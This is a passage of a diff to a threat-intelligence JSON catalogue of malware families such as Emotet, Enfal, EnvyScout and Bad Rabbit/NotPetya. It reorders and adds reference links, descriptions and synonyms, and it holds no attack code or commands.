+ "https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/",
+ "https://isc.sans.edu/diary/28044",
+ "https://community.riskiq.com/article/2cd1c003",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/emotet-adds-new-evasion-technique-and-uses-connected-devices-as-proxy-cc-servers/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf",
+ "https://blog.cyble.com/2022/04/27/emotet-returns-with-new-ttps-and-delivers-lnk-files-to-its-victims/",
+ "https://www.bleepingcomputer.com/news/security/emotet-malware-is-back-and-rebuilding-its-botnet-via-trickbot/",
+ "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus",
+ "https://www.trendmicro.com/en_no/research/23/c/emotet-returns-now-adopts-binary-padding-for-evasion.html",
+ "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89",
+ "https://security-soup.net/quick-post-spooky-new-powershell-obfuscation-in-emotet-maldocs/",
+ "https://forensicitguy.github.io/emotet-excel4-macro-analysis/",
+ "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html",
+ "https://www.dragos.com/blog/industry-news/suspected-conti-ransomware-activity-in-the-auto-manufacturing-sector/",
+ "https://threatresearch.ext.hp.com/emotets-return-whats-different/",
+ "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://isc.sans.edu/forums/diary/Emotet+Stops+Using+0000+in+Spambot+Traffic/28270/",
+ "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
+ "https://www.jpcert.or.jp/english/at/2019/at190044.html",
+ "https://www.cynet.com/attack-techniques-hands-on/new-wave-of-emotet-when-project-x-turns-into-y/",
+ "https://www.netresec.com/?page=Blog&month=2022-05&post=Emotet-C2-and-Spam-Traffic-Video",
+ "https://blog.lumen.com/emotet-redux/",
+ "https://mirshadx.wordpress.com/2020/11/22/analyzing-an-emotet-dropper-and-writing-a-python-script-to-statically-unpack-payload/",
+ "https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://adalogics.com/blog/the-state-of-advanced-code-injections",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/",
+ "https://www.intrinsec.com/emotet-returns-and-deploys-loaders/",
+ "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/",
+ "https://www.youtube.com/watch?v=EyDiIAt__dI",
+ "https://muha2xmad.github.io/unpacking/emotet-part-2/",
+ "https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/",
+ "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html",
+ "https://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
+ "https://isc.sans.edu/diary/rss/27036",
+ "http://ropgadget.com/posts/defensive_pcres.html",
+ "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/",
+ "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/",
+ "https://www.hornetsecurity.com/en/security-information/emotet-update-increases-downloads/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.trendmicro.com/en_us/research/22/a/emotet-spam-abuses-unconventional-ip-address-formats-spread-malware.html",
+ "https://kienmanowar.wordpress.com/2022/12/19/z2abimonthly-malware-challege-emotet-back-from-the-dead/",
+ "https://www.youtube.com/watch?v=_BLOmClsSpc",
+ "https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles",
+ "https://www.zdnet.com/article/meet-the-white-hat-group-fighting-emotet-the-worlds-most-dangerous-malware/",
+ "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/",
+ "https://blogs.vmware.com/security/2022/03/emotet-c2-configuration-extraction-and-analysis.html",
+ "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html",
+ "https://www.netskope.com/blog/emotet-new-delivery-mechanism-to-bypass-vba-protection",
+ "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/",
+ "https://cert-agid.gov.it/news/malware/semplificare-lanalisi-di-emotet-con-python-e-iced-x86/",
+ "https://unit42.paloaltonetworks.com/emotet-malware-summary-epoch-4-5/",
+ "https://blogs.vmware.com/networkvirtualization/2022/02/emotet-is-not-dead-yet-part-2.html/",
+ "https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-droppers/",
+ "https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5",
+ "https://www.fortinet.com/blog/threat-research/Trends-in-the-recent-emotet-maldoc-outbreak",
+ "https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/",
+ "https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns",
+ "https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/",
+ "https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/",
+ "https://medium.com/@0xd0cf11e/analyzing-emotet-with-ghidra-part-1-4da71a5c8d69",
+ "https://www.cyren.com/blog/articles/example-analysis-of-multi-component-malware",
+ "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
+ "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return",
+ "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1",
+ "https://www.hornetsecurity.com/en/security-information/awaiting-the-inevitable-return-of-emotet/",
+ "https://cert.grnet.gr/en/blog/reverse-engineering-emotet/",
+ "https://krebsonsecurity.com/2021/01/international-action-targets-emotet-crimeware"
],
"synonyms": [
"Geodo",
@@ -22122,15 +23508,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "3f7616bd-f1de-46ee-87c2-43c0c2edaa28",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "d29eb927-d53d-4af2-b6ce-17b3a1b34fe7",
"value": "Emotet"
},
@@ -22139,28 +23516,29 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.empire_downloader",
- "https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/looking-over-the-nation-state-actors-shoulders.html",
- "https://redcanary.com/blog/getsystem-offsec/",
- "https://twitter.com/thor_scanner/status/992036762515050496",
- "https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/",
- "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
- "https://unit42.paloaltonetworks.com/atoms/obscureserpens/",
- "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
- "http://www.secureworks.com/research/threat-profiles/gold-heron",
- "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
- "https://www.secureworks.com/research/threat-profiles/gold-ulrick",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://attack.mitre.org/groups/G0096",
"http://www.secureworks.com/research/threat-profiles/gold-burlap",
+ "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
+ "https://unit42.paloaltonetworks.com/atoms/obscureserpens/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
+ "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-atlas",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
+ "https://twitter.com/thor_scanner/status/992036762515050496",
"https://paper.seebug.org/1301/",
"https://www.secureworks.com/research/threat-profiles/gold-heron",
- "https://www.secureworks.com/research/threat-profiles/gold-drake",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
- "https://attack.mitre.org/groups/G0096",
- "https://www.mandiant.com/media/12596/download"
+ "http://www.secureworks.com/research/threat-profiles/gold-heron",
+ "https://redcanary.com/blog/getsystem-offsec/",
+ "https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/looking-over-the-nation-state-actors-shoulders.html",
+ "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.mandiant.com/media/12596/download",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a",
+ "https://www.secureworks.com/research/threat-profiles/gold-ulrick"
],
"synonyms": [],
"type": []
@@ -22188,12 +23566,12 @@
"https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal",
"https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/",
"https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-union",
"https://documents.trendmicro.com/assets/wp/wp-detecting-apt-activity-with-network-traffic-analysis.pdf",
- "https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-union",
"https://attack.mitre.org/groups/G0011",
- "https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/",
- "https://www.secureworks.com/research/threat-profiles/bronze-palace"
+ "https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-palace",
+ "https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/"
],
"synonyms": [
"Lurid"
@@ -22203,14 +23581,28 @@
"uuid": "2a4cacb7-80a1-417e-8b9c-54b4089f35d9",
"value": "Enfal"
},
+ {
+ "description": "According to Trend Micro, this is a downloader, dedicated to stage execution of a second stage malware called Enigma Stealer.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.enigma_loader",
+ "https://www.trendmicro.com/en_us/research/23/b/enigma-stealer-targets-cryptocurrency-industry-with-fake-jobs.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "7491f483-f3d2-4f90-be19-df1e3783f66f",
+ "value": "Enigma Loader"
+ },
{
"description": "Entropy is a ransomware first seen in 1st quarter of 2022, is being used in conjunction of Dridex infection. The ransomware uses a custom packer to pack itself which has been seen in some early dridex samples. ",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.entropy",
"https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/?cmp=30728",
- "https://killingthebear.jorgetesta.tech/actors/evil-corp",
"https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/",
+ "https://killingthebear.jorgetesta.tech/actors/evil-corp",
+ "https://lka.polizei.nrw/presse/schlag-gegen-international-agierendes-netzwerk-von-cyber-kriminellen",
"https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/"
],
"synonyms": [],
@@ -22237,13 +23629,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.envyscout",
- "https://www.sekoia.io/en/nobeliums-envyscout-infection-chain-goes-in-the-registry-targeting-embassies/",
- "https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/",
"https://blog.bushidotoken.net/2022/06/overview-of-russian-gru-and-svr.html",
+ "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf",
+ "https://cert-agid.gov.it/news/il-malware-envyscout-apt29-e-stato-veicolato-anche-in-italia/",
+ "https://www.sekoia.io/en/nobeliums-envyscout-infection-chain-goes-in-the-registry-targeting-embassies/",
+ "https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58",
"https://go.recordedfuture.com/hubfs/reports/cta-2022-0503.pdf",
- "https://cert-agid.gov.it/news/il-malware-envyscout-apt29-e-stato-veicolato-anche-in-italia/"
+ "https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/",
+ "https://blogs.blackberry.com/en/2023/03/nobelium-targets-eu-governments-assisting-ukraine"
+ ],
+ "synonyms": [
+ "ROOTSAW"
],
- "synonyms": [],
"type": []
},
"uuid": "0890e245-319d-4291-8f49-21dbc9486181",
@@ -22255,8 +23652,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.epsilon_red",
"https://therecord.media/epsilonred-ransomware-group-hits-one-of-indias-financial-software-powerhouses/",
- "https://cybleinc.com/2021/06/03/nucleus-software-becomes-victim-of-the-blackcocaine-ransomware/",
"https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://cybleinc.com/2021/06/03/nucleus-software-becomes-victim-of-the-blackcocaine-ransomware/",
"https://news.sophos.com/en-us/2021/05/28/epsilonred/"
],
"synonyms": [
@@ -22273,22 +23670,13 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.equationdrug",
"https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/",
- "https://mp.weixin.qq.com/s/3ZQhn32NB6p-LwndB2o2zQ",
"https://securelist.com/inside-the-equationdrug-espionage-platform/69203/",
- "http://artemonsecurity.blogspot.com/2017/03/equationdrug-rootkit-analysis-mstcp32sys.html"
+ "http://artemonsecurity.blogspot.com/2017/03/equationdrug-rootkit-analysis-mstcp32sys.html",
+ "https://mp.weixin.qq.com/s/3ZQhn32NB6p-LwndB2o2zQ"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "3e0c2d35-87cb-40f9-b341-a6c8dbec697e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "c4490972-3403-4043-9d61-899c0a440940",
"value": "EquationDrug"
},
@@ -22298,13 +23686,13 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.equationgroup",
"https://laanwj.github.io/2016/09/09/blatsting-lp-transcript.html",
- "https://laanwj.github.io/2016/09/01/tadaqueos.html",
- "https://laanwj.github.io/2016/08/28/feintcloud.html",
- "https://laanwj.github.io/2016/09/13/blatsting-rsa.html",
- "https://laanwj.github.io/2016/08/22/blatsting.html",
- "https://laanwj.github.io/2016/09/23/seconddate-adventures.html",
"https://laanwj.github.io/2016/09/11/buzzdirection.html",
+ "https://laanwj.github.io/2016/09/13/blatsting-rsa.html",
+ "https://laanwj.github.io/2016/09/23/seconddate-adventures.html",
"https://research.checkpoint.com/2021/a-deep-dive-into-doublefeature-equation-groups-post-exploitation-dashboard/",
+ "https://laanwj.github.io/2016/08/28/feintcloud.html",
+ "https://laanwj.github.io/2016/09/01/tadaqueos.html",
+ "https://laanwj.github.io/2016/08/22/blatsting.html",
"https://laanwj.github.io/2016/09/17/seconddate-cnc.html",
"https://laanwj.github.io/2016/09/04/blatsting-command-and-control.html"
],
@@ -22315,10 +23703,13 @@
"value": "Equationgroup (Sorting)"
},
{
- "description": "",
+ "description": "Erbium is an information stealer advertised and sold as a Malware-as-a-Service on cybercrime forums and Telegram since at least July 2022. Its capabilities are those of a classic information stealer, with a focus on cryptocurrency wallets, and file grabber capabilities.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.erbium_stealer",
+ "https://blog.cluster25.duskrise.com/2022/09/15/erbium-stealer-a-new-infostealer",
+ "https://www.bleepingcomputer.com/news/security/new-erbium-password-stealing-malware-spreads-as-game-cracks-cheats/",
+ "https://twitter.com/sekoia_io/status/1577222282929311744",
"https://twitter.com/abuse_ch/status/1565290110572175361"
],
"synonyms": [],
@@ -22398,8 +23789,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.eternalrocks",
- "https://github.com/stamparm/EternalRocks",
- "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/"
+ "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/",
+ "https://github.com/stamparm/EternalRocks"
],
"synonyms": [
"MicroBotMassiveNet"
@@ -22410,74 +23801,78 @@
"value": "EternalRocks"
},
{
- "description": "",
+ "description": "According to proofpoint, Bad Rabbit is a strain of ransomware that first appeared in 2017 and is a suspected variant of Petya. Like other strains of ransomware, Bad Rabbit virus infections lock up victims’ computers, servers, or files preventing them from regaining access until a ransom—usually in Bitcoin—is paid.\r\n\r\n",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya",
- "http://www.intezer.com/notpetya-returns-bad-rabbit/",
- "https://blog.talosintelligence.com/2022/02/current-executive-guidance-for-ongoing.html",
- "https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/",
- "https://securelist.com/big-threats-using-code-similarity-part-1/97239/",
- "https://www.cyberscoop.com/russian-hackers-notpetya-charges-gru/",
- "https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/",
- "https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/",
"https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/",
- "https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4",
- "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://attack.mitre.org/groups/G0034",
- "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
- "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back",
- "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
- "https://www.secureworks.com/research/threat-profiles/iron-viking",
- "https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html",
- "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/",
- "https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik",
- "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf",
- "https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html",
- "https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer",
- "https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/",
+ "https://securelist.com/big-threats-using-code-similarity-part-1/97239/",
"https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/",
- "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/",
- "https://www.welivesecurity.com/2017/06/27/new-ransomware-attack-hits-ukraine",
- "https://www.riskiq.com/blog/labs/badrabbit/",
- "https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/",
- "https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/",
- "https://securelist.com/bad-rabbit-ransomware/82851/",
- "https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf",
- "https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b",
- "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games",
- "https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/",
- "https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf",
- "https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/",
- "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/",
- "https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna",
- "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware",
- "https://istari-global.com/spotlight/the-untold-story-of-notpetya/",
- "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/",
"https://securelist.com/apt-trends-report-q2-2020/97937/",
- "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/",
- "https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/",
- "http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html",
- "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks",
- "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html",
- "https://aguinet.github.io//blog/2020/08/29/miasm-bootloader.html",
- "http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html",
"https://gvnshtn.com/maersk-me-notpetya/",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
- "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
- "https://marcoramilli.com/2022/03/01/diskkill-hermeticwiper-and-notpetya-dissimilarities/",
- "http://blog.talosintelligence.com/2017/10/bad-rabbit.html",
"https://threatpost.com/ukrainian-man-arrested-charged-in-notpetya-distribution/127391/",
+ "https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna",
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
+ "https://blog.talosintelligence.com/2022/02/current-executive-guidance-for-ongoing.html",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf",
+ "https://medium.com/@Ilandu/petya-not-petya-ransomware-9619cbbb0786",
+ "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/",
+ "http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html",
+ "https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/",
+ "https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik",
+ "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/",
+ "http://www.intezer.com/notpetya-returns-bad-rabbit/",
+ "https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/",
+ "https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
+ "https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/",
+ "https://securelist.com/from-blackenergy-to-expetr/78937/",
+ "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too",
+ "https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/",
+ "https://www.secureworks.com/research/threat-profiles/iron-viking",
+ "https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/",
+ "https://securelist.com/bad-rabbit-ransomware/82851/",
+ "https://www.cyberscoop.com/russian-hackers-notpetya-charges-gru/",
+ "https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer",
+ "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/",
+ "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
+ "https://therecord.media/mondelez-and-zurich-reach-settlement-in-notpetya-cyberattack-insurance-suit/",
+ "https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf",
+ "https://www.welivesecurity.com/2017/06/27/new-ransomware-attack-hits-ukraine",
+ "https://marcoramilli.com/2022/03/01/diskkill-hermeticwiper-and-notpetya-dissimilarities/",
+ "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks",
+ "https://attack.mitre.org/groups/G0034",
+ "https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/",
+ "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/",
+ "http://blog.talosintelligence.com/2017/10/bad-rabbit.html",
+ "http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html",
+ "https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/",
+ "https://istari-global.com/spotlight/the-untold-story-of-notpetya/",
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-to-assess-real-world-resilience/",
- "https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back",
+ "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games",
+ "https://www.riskiq.com/blog/labs/badrabbit/",
+ "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf",
+ "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/",
+ "https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html",
"https://securelist.com/apt-trends-report-q2-2019/91897/",
- "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
+ "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
+ "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware",
+ "https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html",
+ "https://www.atlanticcouncil.org/content-series/tech-at-the-leading-edge/the-russian-cyber-unit-that-hacks-targets-on-site/",
+ "https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/",
+ "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b",
"https://securelist.com/schroedingers-petya/78870/",
+ "https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/",
+ "https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/",
+ "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf",
+ "https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/",
+ "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/",
"https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-yet-another-stolen-piece-package/",
- "https://securelist.com/from-blackenergy-to-expetr/78937/"
+ "https://aguinet.github.io//blog/2020/08/29/miasm-bootloader.html"
],
"synonyms": [
"BadRabbit",
@@ -22500,8 +23895,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.eternity_clipper",
